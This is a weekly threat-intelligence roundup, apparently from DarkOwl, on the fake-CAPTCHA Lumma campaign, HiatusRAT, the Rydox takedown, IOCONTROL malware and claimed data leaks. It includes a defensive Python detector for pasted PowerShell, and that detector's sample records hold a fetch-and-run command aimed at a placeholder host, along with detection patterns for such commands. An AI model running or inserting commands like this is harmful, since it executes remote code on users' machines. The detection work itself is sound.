Deep and Dark Web Round Up
Weekly Highlights
Malvertising Campaign Distributes Lumma Malware Via Fake CAPTCHAs
FBI Warns of HiatusRAT Malware Attacks Targeting Web Cameras and DVRs
DOJ Announces Seizure of Rydox and Arrest of Administrators
Iran-Affiliated Threat Actors Target U.S. and Israel with IOCONTROL Malware
Malware/Ransomware
Malvertising Campaign Distributes Lumma Malware Via Fake CAPTCHAs
Researchers at GuardioLabs have identified a malvertising campaign distributing the Lumma infostealer malware using fake CAPTCHAs. As detailed in the firm’s findings, a seemingly legitimate CAPTCHA page appears unexpectedly while browsing a site. Completing the CAPTCHA, however, leads the victim to paste and execute a PowerShell command, which results in the installation of Lumma. Based on an analysis of DNS fingerprints, server IPs, and locations, GuardioLabs linked the activity to the threat actor Vane Viper.
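From a defender's side, the distinguishing trait of the chain above is that the victim, not a dropper, launches PowerShell: a command pasted into the Run dialog is spawned with explorer.exe as its parent and typically carries a hidden-window, encoded, or download-and-invoke option. The following Python is an added example written for this roundup (not GuardioLabs' or DarkOwl's code) that applies that idea to process-creation records. The explorer.exe parent heuristic, the indicator patterns, the field names and the sample records are all assumptions constructed for the example; a real deployment would read Sysmon Event ID 1 or equivalent EDR telemetry.

```python
import re
from dataclasses import dataclass
from typing import List, Tuple


@dataclass
class ProcEvent:
    """One process-creation record with Sysmon Event ID 1 style fields (assumed layout)."""
    parent_image: str
    image: str
    command_line: str


# Assumption: a command pasted into the Windows Run dialog is launched with
# explorer.exe as its parent, whereas service- or scheduler-driven PowerShell is not.
INTERACTIVE_PARENTS = {"explorer.exe"}
SCRIPT_HOSTS = {"powershell.exe", "pwsh.exe"}

# Command-line indicators paired with a label. These patterns are constructed for
# the example and are deliberately narrow; tune them against your own baseline.
INDICATORS: List[Tuple[re.Pattern, str]] = [
    (re.compile(r"(?i)-w(?:indowstyle)?\s+hidden"), "hidden window"),
    (re.compile(r"(?i)-e(?:nc|ncodedcommand)?\s+[A-Za-z0-9+/=]{16,}"), "encoded command"),
    (re.compile(r"(?i)\b(?:iex|invoke-expression)\b"), "invoke-expression"),
    (re.compile(r"(?i)(?:downloadstring|invoke-webrequest|invoke-restmethod|\biwr\b|\birm\b)"),
     "remote download"),
]


def basename(path: str) -> str:
    """Return the lower-cased file name from a Windows or POSIX path."""
    return path.replace("\\", "/").rsplit("/", 1)[-1].lower()


def command_line_hits(command_line: str) -> List[str]:
    """Labels of every indicator pattern that matches the command line."""
    return [label for pattern, label in INDICATORS if pattern.search(command_line)]


def classify(ev: ProcEvent) -> List[str]:
    """Reasons an event looks like a pasted-and-run PowerShell command; [] if it does not.

    An alert needs both conditions: an interactive parent AND at least one
    command-line indicator. A plain interactive PowerShell console is not flagged.
    """
    if basename(ev.image) not in SCRIPT_HOSTS:
        return []
    if basename(ev.parent_image) not in INTERACTIVE_PARENTS:
        return []
    hits = command_line_hits(ev.command_line)
    if not hits:
        return []
    return ["interactive launch (explorer.exe parent)"] + hits


def detect_paste_and_run(events: List[ProcEvent]) -> List[Tuple[int, List[str]]]:
    """Return (index, reasons) for every event that classify() flags."""
    alerts = []
    for idx, ev in enumerate(events):
        reasons = classify(ev)
        if reasons:
            alerts.append((idx, reasons))
    return alerts


# Constructed sample records (example.invalid is a reserved, non-resolving domain).
SAMPLE_EVENTS = [
    # 0: user pasted a command into Win+R: hidden window, IEX of a downloaded string
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              'powershell.exe -w hidden -c "iex (irm https://example.invalid/verify)"'),
    # 1: user simply opened a PowerShell console; benign
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe"),
    # 2: scheduled administrative script; non-interactive parent, no indicators
    ProcEvent(r"C:\Windows\System32\svchost.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              r"powershell.exe -NoProfile -ExecutionPolicy Bypass -File C:\scripts\inventory.ps1"),
    # 3: user pasted an encoded command (constructed base64, not a real payload)
    ProcEvent(r"C:\Windows\explorer.exe", r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
              "powershell.exe -nop -enc SQBFAFgAIAAoAE4AZQB3AC0ATwBiAGoAZQBjAHQAKQA="),
]


if __name__ == "__main__":
    for idx, reasons in detect_paste_and_run(SAMPLE_EVENTS):
        print(f"event {idx}: {SAMPLE_EVENTS[idx].command_line}")
        for reason in reasons:
            print(f"    - {reason}")
```

Events 0 and 3 are flagged; events 1 and 2 are not. The two-condition rule is the point: the indicator patterns alone would also match legitimate administrative scripts, and the explorer.exe parent alone would match every console a user opens, so neither is a useful signal by itself.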
FBI Warns of HiatusRAT Malware Attacks Targeting Web Cameras and DVRs
In a December 16 Private Industry Notification (PIN), the Federal Bureau of Investigation (FBI) warned of HiatusRAT actors targeting Chinese-branded web cameras and DVRs. HiatusRAT—a Remote Access Trojan (RAT) used by threat actors to remotely gain control of a device—has focused on targeting devices waiting for security patches. This malicious activity was observed in March 2024, when the threat actors carried out a scanning campaign targeting Internet of Things (IoT) devices in several countries, including the U.S.
Threat Actor Activity
DOJ Announces Seizure of Rydox and Arrest of Administrators
In a December 12 press release, the U.S. Department of Justice (DOJ) announced the seizure of Rydox, an illicit online marketplace known for selling “stolen personal information, access devices, and other tools for carrying out cybercrime and fraud.” The press release also revealed the arrest of three Kosovo nationals for serving as Rydox’s administrators. Two of the administrators were arrested in Kosovo while the third was arrested in Albania.
Iran-Affiliated Threat Actors Target U.S. and Israel with IOCONTROL Malware
Researchers have linked Iranian-affiliated threat actors to IOCONTROL, a new custom malware primarily targeting IoT and operational technology (OT) in Israel and the United States. As highlighted by the cybersecurity firm Claroty, IOCONTROL has been observed targeting “IP cameras, routers, programmable logic controllers (PLCs), human-machine interfaces (HMIs), firewalls, and other Linux-based IoT/OT platforms.” Impacted vendors have included “Baicells, D-Link, Hikvision, Red Lion, Orpak, Phoenix Contact, Teltonika, [and] Unitronics.”
Notable Leaks and Breaches
Autodr[.]it
On December 15, a threat actor on BreachForums claimed to have leaked data from the Italian website autodr[.]it, which specializes in selling used cars. Based on sample data included in the post, the leaked data appears to include IDs, telephone numbers, full names, email addresses, and more.
Maxxecom
On December 17, a threat actor on BreachForums claimed to have leaked data from Maxxecom[.]com, a “fully automated B2B e-commerce solution provider.” According to the post, the leak dates from March 2024 and includes over 1.8 million customer records. Exposed data includes “ID, order ID, eBay order ID, transaction details, item titles and SKUs, shipment tracking, buyer names, buyer emails, shipping addresses, phone numbers, payment methods, order statuses, invoices, vendor details, and timestamps.”
RM Group of Education
On December 17, a threat actor on BreachForums claimed to have leaked data from RM Group of Education, “India's leading educational Counsellor/Advisor, providing expert services for MBBS Admission in India and abroad.” Exposed data includes contacts, complaints, admins, billings, addresses, wallets, WhatsApp details, and more.
SERECI
On December 17, a threat actor on BreachForums claimed to have leaked data from SERECI (Servicio de Registro Civico Nacional), “an entity that registers birth, marriage, and death certificates of all citizens of Bolivia.” As of December 17, the threat actor has shared only a portion of the records but claims that all records will be released in the near future. There are reportedly 79,284 citizen records in total.
Suggested Further Reading
New Android NoviSpy spyware linked to Qualcomm zero-day bugs
Germany Disrupts BADBOX Malware on 30,000 Devices Using Sinkhole Action
FTC warns of online task job scams hooking victims like gambling
CISA orders federal agencies to secure Microsoft 365 tenants
Attackers Exploit Microsoft Teams and AnyDesk to Deploy DarkGate Malware
Ireland fines Meta $264 million over 2018 Facebook data breach
Hackers Use Microsoft MSC Files to Deploy Obfuscated Backdoor in Pakistan Attacks
Bitter APT Targets Turkish Defense Sector with WmRAT and MiyaRAT Malware
The Mask APT Resurfaces with Sophisticated Multi-Platform Malware Arsenal
About DarkOwl
DarkOwl uses machine learning to automatically, continuously, and anonymously collect, index, and rank darknet, deep web, and high-risk surface net data, allowing for simplicity in searching.
Our platform collects and stores data in near real-time, allowing darknet sites that frequently change location and availability to be queried in a safe and secure manner without having to access the darknet itself.
DarkOwl is unique not only in the depth and breadth of its darknet data, but also in the relevance and searchability of its data, its investigation tools, and its passionate customer service. As importantly, DarkOwl data is ethically and safely collected from the darknet, allowing users secure and anonymous access to information and threats relevant to their mission. Our passion, our focus, and our expertise is the darknet.
For more information, visit www.darkowl.com.